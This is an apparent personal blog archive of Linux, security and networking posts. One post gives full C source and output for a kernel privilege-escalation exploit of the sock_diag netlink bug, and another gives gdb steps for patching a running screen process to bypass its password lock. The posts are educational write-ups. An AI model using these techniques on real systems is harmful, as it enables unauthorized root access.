I suppose the provider is using relatively old Cisco equipment. For example, some of their documentation hints at how the filtering is implemented. See this PDF, p. 39-5:

When filtering is enabled and a request for content is directed through the security appliance, the request is sent to the content server and to the filtering server at the same time. If the filtering server allows the connection, the security appliance forwards the response from the content server to the originating client. If the filtering server denies the connection, the security appliance drops the response and sends a message or return code indicating that the connection was not successful.

The other big provider in the UAE uses a different filtering technique, which does not rely on TCP hacks but employs a real HTTP proxy. (I heard someone mention “Bluecoat” but have no data to back it up.)

posted 2013-04-15 ∴ tagged censorship, security, dubai, linux and iptables

Locking a screen session

The famous screen program – luckily by now mostly obsolete thanks to tmux – has a feature to “password lock” a session. The manual:

This is useful if you have privileged programs running under screen and you want to protect your session from reattach attempts by another user masquerading as your uid (i.e. any superuser.)

This is of course utter crap. As the super user, you can do anything you like, including changing a program’s executable at run time, which I want to demonstrate for screen as a POC.

The password is checked on the server side (which usually runs with setuid root) here:

if (strncmp(crypt(pwdata->buf, up), up, strlen(up))) {
    ...
    AddStr("\r\nPassword incorrect.\r\n");
    ...
}

If I am root, I can patch the running binary. Ultimately, I want to circumvent this passwordcheck. But we need to do some preparation:

First, find the string about the incorrect password that is passed to AddStr. Since this is a compile-time constant, it is stored in the .rodata section of the ELF.

Just fire up GDB on the screen binary, list the sections (redacted for brevity here)…

(gdb) maintenance info sections
Exec file:
    `/usr/bin/screen', file type elf64-x86-64.
    ...
    0x00403a50->0x0044ee8c at 0x00003a50: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x0044ee8c->0x0044ee95 at 0x0004ee8c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
    0x0044eea0->0x00458a01 at 0x0004eea0: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
    ...

… and search for said string in the .rodata section:

(gdb) find 0x0044eea0, 0x00458a01, "\r\nPassword incorrect.\r\n"
0x45148a
warning: Unable to access target memory at 0x455322, halting search.
1 pattern found.

Now, we need to locate the piece of code comparing the password. Let’s first search for the call to AddStr by taking advantage of the fact that we know the address of the string that will be passed as the argument. We search in .text for the address of the string:

(gdb) find 0x00403a50, 0x0044ee8c, 0x45148a
0x41b371
1 pattern found.

Now there should be a jne instruction shortly before that (this instruction stands for “jump if not equal” and has the opcode 0x75). Let’s search for it:

(gdb) find/b 0x41b371-0x100, +0x100, 0x75
0x41b2f2
1 pattern found.

Decode the instruction:

(gdb) x/i 0x41b2f2
   0x41b2f2:    jne    0x41b370

This is it. (If you want to be sure, search the instructions before that. Shortly before that, at 0x41b2cb, I find: callq 403120 <strncmp@plt>.)

Now we can simply patch the live binary, changing 0x75 to 0x74 (jne to je or “jump if equal”), thus effectively inverting the if expression. Find the screen server process (it’s written in all caps in the ps output, i.e. SCREEN) and patch it like this, where =(cmd) is a Z-Shell shortcut for “create temporary file and delete it after the command finishes”:

$ sudo gdb -batch -p 23437 -x =(echo "set *(unsigned char *)0x41b2f2 = 0x74\nquit")

All done. Just attach using screen -x, but be sure not to enter the correct password: That’s the only one that will not give you access now.

posted 2013-03-12 ∴ tagged linux, c and security

Privilege Escalation Kernel Exploit

So my friend Nico tweeted that there is an „easy linux kernel privilege escalation“ and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, I discovered later. They differ in technique and reliability, and I guess others can do better than me.

I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

So we should do exactly that! One of the hardest parts was actually finding out how to send such a NetLink message, but I’ll come to that later. Let’s first have a look at the code that was patched (this is from net/core/sock_diag.c):

static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)
{
    int err;
    struct sock_diag_req *req = nlmsg_data(nlh);
    const struct sock_diag_handler *hndl;

    if (nlmsg_len(nlh) < sizeof(*req))
        return -EINVAL;

    /* check for "req->sdiag_family >= AF_MAX" goes here */

    hndl = sock_diag_lock_handler(req->sdiag_family);
    if (hndl == NULL)
        err = -ENOENT;
    else
        err = hndl->dump(skb, nlh);
    sock_diag_unlock_handler(hndl);

    return err;
}

The function sock_diag_lock_handler() locks a mutex and effectively returns sock_diag_handlers[req->sdiag_family], i.e. the unsanitized family number received in the NetLink request. Since AF_MAX is 40, we can effectively return memory from after the end of sock_diag_handlers (“out-of-bounds access”) if we specify a family greater or equal to 40. This memory is accessed as a

struct sock_diag_handler {
    __u8 family;
    int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);
};

… and err = hndl->dump(skb, nlh); calls the function pointed to in the dump field.

So we know: The Kernel follows a pointer to a sock_diag_handler struct, and calls the function stored there. If we find some suitable and (more or less) predictable value after the end of the array, then we might store a specially crafted struct at the referenced address that contains a pointer to some code that will escalate the privileges of the current process. The main function looks like this:

int main(int argc, char **argv)
{
    prepare_privesc_code();
    spray_fake_handler((void *)0x0000000000010000);
    trigger();
    return execv("/bin/sh", (char *[]) { "sh", NULL });
}

First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.

/* privilege escalation code */
#define KERNCALL __attribute__((regparm(3)))
void * (*prepare_kernel_cred)(void *) KERNCALL;
void * (*commit_creds)(void *) KERNCALL;

/* match the signature of a sock_diag_handler dumper function */
int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)
{
    commit_creds(prepare_kernel_cred(0));
    return 0;
}

/* look up an exported Kernel symbol */
void *findksym(const char *sym)
{
    void *p, *ret;
    FILE *fp;
    char s[1024];
    size_t sym_len = strlen(sym);

    fp = fopen("/proc/kallsyms", "r");
    if(!fp)
        err(-1, "cannot open kallsyms: fopen");

    ret = NULL;
    while(fscanf(fp, "%p %*c %1024s\n", &p, s) == 2) {
        if(!!strncmp(sym, s, sym_len))
            continue;
        ret = p;
        break;
    }
    fclose(fp);
    return ret;
}

void prepare_privesc_code(void)
{
    prepare_kernel_cred = findksym("prepare_kernel_cred");
    commit_creds = findksym("commit_creds");
}

This is pretty standard, and you’ll find many variations of that in different exloits.

Now we spray a struct containing this function pointer over a sizable amount of memory:

void spray_fake_handler(const void *addr)
{
    void *pp;
    int po;

    /* align to page boundary */
    pp = (void *) ((ulong)addr & ~0xfffULL);

    pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,
        MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
    if(pp == MAP_FAILED)
        err(-1, "mmap");

    struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };
    for(po = 0; po < 0x10000; po += sizeof(hndl))
        memcpy(pp + po, &hndl, sizeof(hndl));
}

The memory is mapped with MAP_FIXED, which makes mmap() take the memory location as the de facto location, not merely a hint. The location must be a multiple of the page size (which is 4096 or 0x1000 by default), and on most modern systems you cannot map the zero-page (or other low pages), consult sysctl vm.mmap_min_addr for this. (This is to foil attempts to map code to the zero-page to take advantage of a Kernel NULL pointer derefence.)

Now for the actual trigger. To get an idea of what we can do, we should first inspect what comes after the sock_diag_handlers array in the currently running Kernel (this is only possible with root permissions). Since the array is static to that file, we cannot look up the symbol. Instead, we look up the address of a function that accesses said array, sock_diag_register():

$ grep -w sock_diag_register /proc/kallsyms
ffffffff812b6aa2 T sock_diag_register

If this returns all zeroes, try grepping in /boot/System.map-$(uname -r) instead. Then disassemble the function. I annotated the relevant points with the corresponding C code:

$ sudo gdb -c /proc/kcore
(gdb) x/23i 0xffffffff812b6aa2
0xffffffff812b6aa2:  push   %rbp
0xffffffff812b6aa3:  mov    %rdi,%rbp
0xffffffff812b6aa6:  push   %rbx
0xffffffff812b6aa7:  push   %rcx
0xffffffff812b6aa8:  cmpb   $0x27,(%rdi)                ; if (hndl->family >= AF_MAX)
0xffffffff812b6aab:  ja     0xffffffff812b6ae5
0xffffffff812b6aad:  mov    $0xffffffff81668c20,%rdi
0xffffffff812b6ab4:  mov    $0xfffffff0,%ebx
0xffffffff812b6ab9:  callq  0xffffffff813628ee          ; mutex_lock(&sock_diag_table_mutex);
0xffffffff812b6abe:  movzbl 0x0(%rbp),%eax
0xffffffff812b6ac2:  cmpq   $0x0,-0x7e7fe930(,%rax,8)   ; if (sock_diag_handlers[hndl->family])
0xffffffff812b6acb:  jne    0xffffffff812b6ad7
0xffffffff812b6acd:  mov    %rbp,-0x7e7fe930(,%rax,8)   ; sock_diag_handlers[hndl->family] = hndl;
0xffffffff812b6ad5:  xor    %ebx,%ebx
0xffffffff812b6ad7:  mov    $0xffffffff81668c20,%rdi
0xffffffff812b6ade:  callq  0xffffffff813628db
0xffffffff812b6ae3:  jmp    0xffffffff812b6aea
0xffffffff812b6ae5:  mov    $0xffffffea,%ebx
0xffffffff812b6aea:  pop    %rdx
0xffffffff812b6aeb:  mov    %ebx,%eax
0xffffffff812b6aed:  pop    %rbx
0xffffffff812b6aee:  pop    %rbp
0xffffffff812b6aef:  retq

The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value at the address -0x7e7fe930 (which is a shorthand for 0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight being the size of a pointer on a 64-bit system, and %rax the address of the first argument to the function, but at the same time, if you only take one 64-bit-slice, the first member of the (not packed) struct, i.e. the family field. So this line is an array access, and we know that sock_diag_handlers is located at -0x7e7fe930.

(All these steps can actually be done without root permissions: You can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r) && dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start GDB on the resulting ELF file. Only now you actually need to inspect the main memory.)

(gdb) x/46xg -0x7e7fe930
0xffffffff818016d0:     0x0000000000000000      0x0000000000000000
0xffffffff818016e0:     0x0000000000000000      0x0000000000000000
0xffffffff818016f0:     0x0000000000000000      0x0000000000000000
0xffffffff81801700:     0x0000000000000000      0x0000000000000000
0xffffffff81801710:     0x0000000000000000      0x0000000000000000
0xffffffff81801720:     0x0000000000000000      0x0000000000000000
0xffffffff81801730:     0x0000000000000000      0x0000000000000000
0xffffffff81801740:     0x0000000000000000      0x0000000000000000
0xffffffff81801750:     0x0000000000000000      0x0000000000000000
0xffffffff81801760:     0x0000000000000000      0x0000000000000000
0xffffffff81801770:     0x0000000000000000      0x0000000000000000
0xffffffff81801780:     0x0000000000000000      0x0000000000000000
0xffffffff81801790:     0x0000000000000000      0x0000000000000000
0xffffffff818017a0:     0x0000000000000000      0x0000000000000000
0xffffffff818017b0:     0x0000000000000000      0x0000000000000000
0xffffffff818017c0:     0x0000000000000000      0x0000000000000000
0xffffffff818017d0:     0x0000000000000000      0x0000000000000000
0xffffffff818017e0:     0x0000000000000000      0x0000000000000000
0xffffffff818017f0:     0x0000000000000000      0x0000000000000000
0xffffffff81801800:     0x0000000000000000      0x0000000000000000
0xffffffff81801810:     0x0000000000000000      0x0000000000000000
0xffffffff81801820:     0x000000000000000a      0x0000000000017570
0xffffffff81801830:     0xffffffff8135a666      0xffffffff816740a0

(gdb) p (0xffffffff81801828- -0x7e7fe930)/8
$1 = 43

So now I know that in the Kernel I’m currently running, at the current moment, sock_diag_handlers[43] is 0x0000000000017570, which is a low address, but hopefully not too low. (Nico reported 0x17670, and a current grml live cd in KVM has 0x17470 there.) So we need to send a NetLink message with SOCK_DIAG_BY_FAMILY type set in the header, flags at least NLM_F_REQUEST and the family set to 43. This is what the trigger does:

void trigger(void)
{
    int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);
    if (nl < 0)
        err(-1, "socket");

    struct {
        struct nlmsghdr hdr;
        struct sock_diag_req r;
    } req;

    memset(&req, 0, sizeof(req));
    req.hdr.nlmsg_len = sizeof(req);
    req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;
    req.hdr.nlmsg_flags = NLM_F_REQUEST;
    req.r.sdiag_family = 43; /* guess right offset */

    if(send(nl, &req, sizeof(req), 0) < 0)
        err(-1, "send");
}

All done! Compiling might be difficult, since you need Kernel struct definitions. I used -idirafter and my Kernel headers.

$ make
gcc -g -Wall -idirafter /usr/src/linux-headers-`uname -r`/include -o kex kex.c
$ ./kex
# id
uid=0(root) gid=0(root) groups=0(root)

Note: If something goes wrong, you’ll get a “general protection fault: 0000 [#1] SMP” that looks scary like this:

But by pressing Ctrl-Alt-F1 and -F7 you’ll get the display back. However, the exploit will not work anymore until you have rebooted. I don’t know the reason for this, but it sure made the development cycle an annoying one…

Update: The Protection Fault occurs when first following a bogous function pointer. After that, the exploit cannot longer work because the mutex is still locked and cannot be unlocked. (Thanks, Nico!)

posted 2013-02-26 ∴ tagged linux, c and security

Concurrent Hashing is an Embarrassingly Parallel Problem

So I was reading some rather not so clever code today. I had a gut feeling something was wrong with the code, since I had never seen an idiom like that. A server that does a little hash calculation with lots of threads – and the function that computes the hash had a peculiar feature: Its entire body was wrapped by a mutex lock/unlock clause of a function-static mutex PTHREAD_MUTEX_INITIALIZER, like this:

static EVP_MD_CTX mdctx;
static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
static unsigned char first = 1;

pthread_mutex_lock(&lock);
if (first) {
    EVP_MD_CTX_init(&mdctx);
    first = 0;
}

/* the actual hash computation using &mdctx */

pthread_mutex_unlock(&lock);

In other words, if this function is called multiple times from different threads, it is only run once at a time, possibly waiting for other instances to unlock the (shared) mutex first.

The computation code inside the function looks roughly like this:

if (!EVP_DigestInit_ex(&mdctx, EVP_sha256(), NULL) ||
    !EVP_DigestUpdate(&mdctx, input, inputlen) ||
    !EVP_DigestFinal(&mdctx, hash, &md_len)) {
        ERR_print_errors_fp(stderr);
        exit(-1);
}

This is the typical OpenSSL pattern: You tell it to initialize mdctx to compute the SHA256 digest, then you “update” the digest (i.e., you feed it some bytes) and then you tell it to finish, storing the resulting hash in hash. If either of the functions fail, the OpenSSL error is printed.

So the lock mutex really only protects the mdctx (short for ‘message digest context’). And my gut feeling was that re-initializing the context all the time (i.e. copying stuff around) is much cheaper than synchronizing all the hash operations (i.e., having one stupid bottleneck).

To be sure, I ran a few tests. I wrote a simple C program that scales up the number of threads and looks at how much time you need to hash 10 million 16-byte strings. (You can find the whole quick’n’dirty code on Github.)

First, I have to create a dataset. In order for it to be the same all the time, I use rand_r() with a hard-coded seed, so that over all iterations, the random data set is actually equivalent:

#define DATANUM 10000000
#define DATASIZE 16
static char data[DATANUM][DATASIZE];

void init_data(void)
{
    int n, i;
    unsigned int seedp = 0xdeadbeef; /* make the randomness predictable */
    char alpha[] = "abcdefghijklmnopqrstuvwxyz";

    for(n = 0; n < DATANUM; n++)
            for(i = 0; i < DATASIZE; i++)
                    data[n][i] = alpha[rand_r(&seedp) % 26];
}

Next, you have to give a helping hand to OpenSSL so that it can be run multithreaded. (There are, it seems, certain internal data structures that need protection.) This is a technical detail.

Then I start num threads on equally-sized slices of data while recording and printing out timing statistics:

void hash_all(int num)
{
    int i;
    pthread_t *t;
    struct fromto *ft;
    struct timespec start, end;
    double delta;

    clock_gettime(CLOCK_MONOTONIC, &start);

    t = malloc(num * sizeof *t);
    for(i = 0; i < num; i++) {
        ft = malloc(sizeof(struct fromto));
        ft->from = i * (DATANUM/num);
        ft->to = ((i+1) * (DATANUM/num)) > DATANUM ?
                DATANUM : (i+1) * (DATANUM/num);
        pthread_create(&t[i], NULL, hash_slice, ft);
    }

    for(i = 0; i < num; i++)
            pthread_join(t[i], NULL);

    clock_gettime(CLOCK_MONOTONIC, &end);

    delta = end.tv_sec - start.tv_sec;
    delta += (end.tv_nsec - start.tv_nsec) / 1000000000.0;

    printf("%d threads: %ld hashes/s, total = %.3fs\n",
            num, (unsigned long) (DATANUM / delta), delta);
    free(t);
    sleep(1);
}

Each thread runs the hash_slice() function, which linearly iterates over the slice and calls hash_one(n) for each entry. With preprocessor macros, I define two versions of this function:

void hash_one(int num)
{
    int i;
    unsigned char hash[EVP_MAX_MD_SIZE];
    unsigned int md_len;

#ifdef LOCK_STATIC_EVP_MD_CTX
    static EVP_MD_CTX mdctx;
    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static unsigned char first = 1;

    pthread_mutex_lock(&lock);
    if (first) {
            EVP_MD_CTX_init(&mdctx);
            first = 0;
    }
#else
    EVP_MD_CTX mdctx;
    EVP_MD_CTX_init(&mdctx);
#endif

    /* the actual hashing from above */

#ifdef LOCK_STATIC_EVP_MD_CTX
    pthread_mutex_unlock(&lock);
#endif

    return;
}

The Makefile produces two binaries:

$ make
gcc -Wall -pthread -lrt -lssl -DLOCK_STATIC_EVP_MD_CTX -o speedtest-locked speedtest.c
gcc -Wall -pthread -lrt -lssl -o speedtest-copied speedtest.c

… and the result is as expected. On my Intel i7-2620M quadcore:

$ ./speedtest-copied
1 threads: 1999113 hashes/s, total = 5.002s
2 threads: 3443722 hashes/s, total = 2.904s
4 threads: 3709510 hashes/s, total = 2.696s
8 threads: 3665865 hashes/s, total = 2.728s
12 threads: 3650451 hashes/s, total = 2.739s
24 threads: 3642619 hashes/s, total = 2.745s

$ ./speedtest-locked
1 threads: 2013590 hashes/s, total = 4.966s
2 threads: 857542 hashes/s, total = 11.661s
4 threads: 631336 hashes/s, total = 15.839s
8 threads: 932238 hashes/s, total = 10.727s
12 threads: 850431 hashes/s, total = 11.759s
24 threads: 802501 hashes/s, total = 12.461s

And on an Intel Xeon X5650 24 core machine:

$ ./speedtest-copied
1 threads: 1564546 hashes/s, total = 6.392s
2 threads: 1973912 hashes/s, total = 5.066s
4 threads: 3821067 hashes/s, total = 2.617s
8 threads: 5096136 hashes/s, total = 1.962s
12 threads: 5849133 hashes/s, total = 1.710s
24 threads: 7467990 hashes/s, total = 1.339s

$ ./speedtest-locked
1 threads: 1481025 hashes/s, total = 6.752s
2 threads: 701797 hashes/s, total = 14.249s
4 threads: 338231 hashes/s, total = 29.566s
8 threads: 318873 hashes/s, total = 31.360s
12 threads: 402054 hashes/s, total = 24.872s
24 threads: 304193 hashes/s, total = 32.874s

So, while the real computation times shrink when you don’t force a bottleneck – yes, it’s an embarrassingly parallel problem – the reverse happens if you force synchronization: All the mutex waiting slows the program so much down that you’d better only use one thread or else you lose.

Rule of thumb: If you don’t have a good argument for a multithreading application, simply don’t take the extra effort of implementing it in the first place.

posted 2012-12-12 ∴ tagged c and linux

Details on CVE-2012-5468

In mid-2010 I found a heap corruption in Bogofilter which lead to the Security Advisory 2010-01, CVE-2010-2494 and a new release. – Some weeks ago I found another similar bug, so there’s a new Bogofilter release since yesterday, thanks to the maintainers. (Neither of the bugs have much potential for exploitation, for different reasons.)

I want to shed some light on the details about the new CVE-2012-5468 here: It’s a very subtle bug that rises from the error handling of the character set conversion library iconv.

The Bogofilter Security Advisory 2012-01 contains no real information about the source of the heap corruption. The full description in the advisory is this:

Julius Plenz figured out that bogofilter's/bogolexer's base64 could overwrite heap memory in the character set conversion in certain pathological cases of invalid base64 code that decodes to incomplete multibyte characters.

The problematic code doesn’t look problematic on first glance. Neither on second glance. Take a look yourself. The version here is redacted for brevity: Convert from inbuf to outbuf, handling possible iconv-failures.

count = iconv(xd, (ICONV_CONST char **)&inbuf, &inbytesleft, &outbuf, &outbytesleft);

if (count == (size_t)(-1)) {
    int err = errno;
    switch (err) {
    case EILSEQ: /* invalid multibyte sequence */
    case EINVAL: /* incomplete multibyte sequence */
        if (!replace_nonascii_characters)
            *outbuf = *inbuf;
        else
            *outbuf = '?';

        /* update counts and pointers */
        inbytesleft -= 1;
        outbytesleft -= 1;
        inbuf += 1;
        outbuf += 1;
        break;

    case E2BIG: /* output buffer has no more room */
                /* TODO: Provide proper handling of E2BIG */
        done = true;
        break;

    default:
        break;
    }
}

The iconv API is simple and straightforward: You pass a handle (which among other things contains the source and destination character set; it is called xd here), and two buffers and modifiable integers for the input and output, respectively. (Usually, when transcoding, the function reads one symbol from the source, converts it to another character set, and then “drains” the input buffer by decreasing inbytesleft by the number of bytes that made up the source symbol. Then, the output lenght is checked, and if the target symbol fits, it is appended and the outbytesleft integer is decreased by how much space the symbol used.)

The API function returns -1 in case of an error. The Bogofilter code contains a copy&paste of the error cases from the iconv(3) man page. If you read the libiconv source carefully, you’ll find that …

/* Case 2: not enough bytes available to detect anything */
errno = EINVAL;

comes before

/* Case 4: k bytes read, making up a wide character */
if (outleft == 0) {
    cd->istate = last_istate;
    errno = E2BIG;
    ...
}

So the “certain pathological cases” the SA talks about are met if a substantially large chunk of data makes iconv return -1, because this chunk just happens to end in an invalid multibyte sequence.

But at that point you have no guarantee from the library that your output buffer can take any more bytes. Appending that character or a ? sign causes an out-ouf-bounds write. (This is really subtle. I don’t blame anyone for not noticing this, although sanity checks – if need be via assert(outbytesleft > 0) – are always in order when you do complicated modify-string-on-copy stuff.) Additionally, outbytesleft will be decreased to -1 and thus even an outbytesleft == 0 will return false.

Once you know this, the fix is trivial. And if you dig deep enough in their SVN, there’s my original test to reproduce this.

How do you find bugs like this? – Not without an example message that makes Bogofilter crash reproducibly. In this case it was real mail with a big PDF file attachment sent via my university's mail server. Because Bogofilter would repeatedly crash trying to parse the message, at some point a Nagios check alerted us that one mail in the queue was delayed for more than an hour. So we made a copy of it to examine the bug more closely. A little Valgrinding later, and you know where to start your search for the out-of-bounds write.

posted 2012-12-05 ∴ tagged linux, c, security, spam and university

Live und in Farbe in Hamburg

Lust darauf zu hören, was ich so zu sagen habe? Ich bin diesen Monat auf zwei Veranstaltungen in Hamburg zu Gast: Zunächst morgen bei einer Podiumsdiskussion im Kultwerk West zum Thema: Theater-Abos für IT-Spezialisten? Joachim Lux, Shahab Din und Julius Plenz über Kultur und Nerds und Lux’ Verständnis von Menschsein.

Und wie jedes Jahr bin ich in zwei Wochen auch auf dem Software Freedom Day vertreten, dies Mal mit einem Vortrag zu Bufferbloat und einem kleinen Einsteiger-Git-Workshop. Vielversprechenderweise gibt es dieses Jahr zwei Vortragstracks parallel in neuen Räumlichkeiten. Ich freu mich!

posted 2012-09-03 ∴ tagged life and linux

IPv6 ... here I come

Sooo... I'm finally part of the IPv6 world now, and so is this blog. I've been meaning to do this for a long time now, but ... you know. – I ran into some traps – partly my own fault – so I might just share it for others, too.

First of all, and this got me several times, when testing loosen up your iptables settings. That especially means setting the right policies in ip6tables: ip6tables -P INPUT ACCEPT. (I had set the default policy to DROP before automatically at interface-up time. It's better safe than sorry. Do you know what services listen on :: by default?)

I started out using a simple Teredo tunnel, which worked well enough. See Bart's article ipv6 on your desktop in 2 steps. The default gai.conf, used by the glibc to resolve hosts, will still prefer IPv4 addresses over IPv6 if your only access is a Teredo tunnel. You can change this by commenting out the default label policies in /etc/gai.conf, except for the #label 2001:0::/32 7 line. (See here for example. The blog post advises to reboot or wait 15 minutes, but for me it was enough to re-start my browser / newsreader / ...)

So I set up IPv6 on my server. This was rather easy because Hetzner provides native v6. The real work is just re-creating the iptables rules, adding new AAAA records for DNS. Strike that: The real work is teaching all your small tools to accept IPv6-formatted addresses. (Great efforts are underway to modernize many programs. But especially your odd Perl script will simply choke on the new log files. :-P)

I am still not sure how I should use all these addresses. For now I enabled one "main" IP for the server, 2a01:4f8:150:4022::2. Then I have one for plenz.com and one for the blog, ending in leet-speak "blog": 2a01:4f8:150:4022::b109 – Is it useful to enable one ip for every subdomain and service? It sure seems nice, but also a big administrative burden...

Living with the Teredo tunnel for some hours, I wanted to do it "the right way", i.e. enabling IPv6 tunneling on my router. Over at HE's Tunnelbroker you'll get your free tunnel, suitable for connecting your home network.

I'm still using an old OpenWRT WhiteRussian setup with 2.4 kernel, but everything works surprisingly well, once I figured out how to do it properly. HE conveniently provides commands to set up the tunnel; however, setting up the tunnel creates a default route that routes packets destined to your prefix across the tunnel. (I don't know why this is the case.) Thus, after establishing the tunnel, I'm doing:

# send traffic destined to my prefix via the LAN bridge br0
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0

Second, I want to automatically update my IPv6 tunnel endpoint address. HE conveniently provides and IPv4 interface for that. Simply md5-hash your password via echo -n PASS | md5sum, find out your user name hash from the login start page (apparently not the md5 hash of your username :-P) and your tunnel ID. My script looks like this:

root@ndogo:~# cat /etc/ppp/ip-up.d/he-tunnel
#!/bin/sh
set -x

my_ip="$(ip addr show dev ppp0 | grep '    inet ' | awk '{print $2}')"
wget -O /dev/null "http://ipv4.tunnelbroker.net/ipv4_end.php?ipv4b=$my_ip&pass=PWHASH&user_id=UHASH&tunnel_id=TID"

ip tunnel del he-ipv6
ip tunnel add he-ipv6 mode sit remote 216.66.86.114 local $my_ip ttl 255

# watch the MTU!
ip link set dev he-ipv6 mtu 1280
ip link set he-ipv6 up
ip addr add <prefix>::2/64 dev he-ipv6
ip route add ::/0 dev he-ipv6 mtu 1280

# fix up the routes
ip route del <prefix>::/64 dev he-ipv6
ip route add <prefix>::/64 dev br0 2>/dev/null

Side note: Don't think that scripts under /etc/ppp/ip-up.d would get executed automaically when the interface comes up. Use something like this instead:

root@ndogo:~# cat /etc/hotplug.d/iface/20-ipv6
#!/bin/sh

[ "${ACTION:-ifup}" = "ifup" ] && /etc/ppp/ip-up.d/he-tunnel

The connection seemed to work nicely at first. At least, all Google searches were using IPv6 and were fast at that. However, oftentimes (in about 80% of cases) establishing a connection via IPv6 was not working. Pings (and thus traceroutes) showed no network outage or other delays along the way. However, tcpdump showed wrong checksums for a lot of TCP packets.

Only today I got an idea why this might be: wrong MTU. So I set the MTU to 1280 in the HE web interface and on the router, too: ip link set dev he-ipv6 mtu 1280. Suddenly, all connections work perfectly.

I've been toying around with the privacy extensions, too, but I don't know how to enable the mode "one IP per new service provider". There's some information about the PEs here but for now I have disabled them.

My flatmate's Windows computer and iPhone picked up IPv6 without further configuration.

I'm actually astonished how many web sites are IPv6 ready. So far I like what I'm seeing.

Update: While setting up an AAAA record for the blog, I forgot it had been a wildcard CNAME previously. The blog was not reachable via IPv4 for a day – that was not intended! ;-)

posted 2012-08-06 ∴ tagged ipv6, linux, blog and iptables

Find the Spammer

A week ago our server was listed as sending out spam by the CBL, which is part of the XBL which in turn is part of the widely-used Spamhaus ZEN block list. As a practical result, we couldn't send out mail to GMX or Hotmail any more:

<someone@gmx.de>: host mx0.gmx.net[213.165.64.100] said:
550-5.7.1 {mx048} The IP address of the server you are using to connect to GMX is listed in
550-5.7.1 the XBL Blocking List (CBL + NJABL). 550-5.7.1 For additional information, please visit
550-5.7.1 http://www.spamhaus.org/query/bl?ip=176.9.34.52 and
550 5.7.1 ( http://portal.gmx.net/serverrules ) (in reply to RCPT TO command)

The first source we identified was a postfix alias forwarding to a virtual alias domain; however, I had deleted the user in the latter table, such that postfix would return a "user unknown in virtual alias table" error to the sender. But because the sender was localhost, postfix would create a bounce mail. (This is known as Backscatter.)

But one day later, our IP was listed in CBL again. So I started digging deeper. How do you identify who is sending out spam? There are some obvious points to start:

Old WordPress installations an the like that got owned
Open Relay (mis-configured postfix)
Spam-sending trojan (local process running)

To get a clearer image of what was really happening, I did two things. First, I implemented a very simple "who is doing SMTP" log mechanism using iptables. It went like this:

$ cut -d: -f1 /etc/passwd | while read user; do
    echo iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner $user -j LOG --log-prefix \"$user tried SMTP: \" --log-level 6;
  done
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner root -j LOG --log-prefix "root tried SMTP: " --log-level 6
iptables -A POSTROUTING -p tcp --dport 25 -m owner --uid-owner feh -j LOG --log-prefix "feh tried SMTP: " --log-level 6
...

(To be honest I used a Vim macro to make the list of rules, but that's hard to write down in a blog post.)

Second, I NAT'ed all users except for postfix to a different IP address:

$ iptables -A POSTROUTING -p tcp --dport 25 -m owner ! --uid-owner
    postfix -j SNAT --to-source 176.9.247.94

Then, I dumped the SMTP-related TCP flows for that IP address:

$ tcpflow -c 'host 176.9.247.94 and (dst port 25 or src port 25)'

I waited for a short time, and soon another wave of spam was sent out. Now I could clearly identify the user:

Jul 19 16:48:35 noam kernel: [5590933.619960] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:38 noam kernel: [5590936.616860] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...
Jul 19 16:48:44 noam kernel: [5590942.615608] pete tried SMTP: IN= OUT=eth0 SRC=176.9.34.52 DST=65.55.92.184 ...

But instead of finding an infected web app, I found that the user was logged in via SSH and was executing sleep 3600 commands. When I killed the SSH session, the spamming stopped immediately.

Since this was not a user I know personally, I don't know what happened. My best guess is an infected Windows computer and an SSH SOCKS forwarding setup that allowed the (romanian) spammer to tunnel its connections.

One question remains: Are modern spam-drones able to steal WinSCP/PuTTY login credentials from the Registry and use them to silently set up SSH tunnels? Or was this just a case of bad luck?

posted 2012-07-21 ∴ tagged linux, iptables and spam

Trying the CoDel Bufferbloat solution locally

I'm currently working on a computer science project where we try to understand and possibly research solutions to the bufferbloat phenomenon. We created some simple RRD graphing automatism to better visualize the phenomenon.

In short – and most internet users would say this is perfectly normal behaviour – Bufferbloat describes that with high-speed uploads or downloads, network latency skyrockets. For my home router and a five-megabyte upload, it looks like this:

Normal Bufferbloat

The grid intervals are in seconds and feature 10 data points corresponding to 10 pings in that second to a server (here 8.8.8.8). Lighter blue means further away from the median, which for clarity is displayed as a black line, too. – Thus you can see that the nearly constant ping time of ~20ms goes up to an unsteady ~140ms during the upload.

In the next-20120524 Kernel tree the codel and fq_codel queuing disciplines were made available. The CoDel implementation is based on this month's paper by van Jacobsen at al, which is definitely worth a read (and features good explanatory diagrams, too).

